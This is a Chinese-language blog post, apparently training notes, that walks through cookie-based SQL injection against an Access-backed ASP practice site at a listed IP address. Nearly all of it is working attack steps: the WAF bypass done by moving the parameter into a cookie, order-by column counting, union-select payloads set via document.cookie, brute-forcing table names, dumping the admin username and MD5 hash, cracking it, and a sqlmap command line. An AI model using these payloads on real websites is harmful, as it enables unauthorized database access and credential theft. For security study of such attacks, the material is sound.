Access注入--cookie注入

                                           Access注入--cookie注入

 

针对老网站: asp aspx php<5.4以下>

 

题目: http://59.63.200.79:8004

 

1.http://59.63.200.79:8004/shownews.asp?id=171-1

#页面有变化,存在注入

 

2.http://59.63.200.79:8004/shownews.asp?id=171' and order by 1 -- qwe

#检测到非法字符,有防护.

怎么绕过:

1.规则绕过:

          1.用其他函数替换要用的函数

          2.用一些大小写或其他的方法去绕过

2.让waf不再对我们检测

 

id=171        GET传参

                   POST传参

                   Cookie传参 = header传参

                   PHP中的 $REQUEST['id'] 可以接收GET传参,POST传参,Cookie传参

                   注:php5.4以上不会接收Cookie传参

 

设置Cookie:ookie使用需要URL编码

1.浏览器F12,Applica,Cookies

2.burp 抓包,URL编码,添加cookie,重放

3.浏览器F12,Console js控制台, document.cookie="id="+escape("171 order by 10")

删除URL中的id=171,重新进入网页.

 

3.document.cookie="id="+escape("171 order by 11")

#10,正常 11,异常 有10个字段

 

4.document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10")

#报错,因为数据库不同,Access数据库是非常老的数据库,MySQL语法不同

#access:没有系统自带表,没有库名

强行猜测: user admin news job

 

5.document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from user...")

#强猜表名 使用burp,添加sqlmap中的表名字典进行爆破

 

6.document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin")

#报出2,3,字段点,字段名也需要强猜.

 

7.document.cookie="id="+escape("171 union select 1,username,password,4,5,6,7,8,9,10 from admin")

#得出username:admin

 password:b9a2a2b5dffb918c

 

8, b9a2a2b5dffb918c MD5解码: welcome

 

使用sqlmap工具跑Cookie注入:

sqlmap.py -u "http://...../.../.asp" --cookie "id=171" --level 2

 

Cookie注入的核心: 传参的方式不同

        asp(很常见10 9个)

        PHP(10 1个)

        jsp(100 1~2个)

cookie注入和数据库没有关系

         Access

        mysql

        oracle

        mssql

        DB2

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值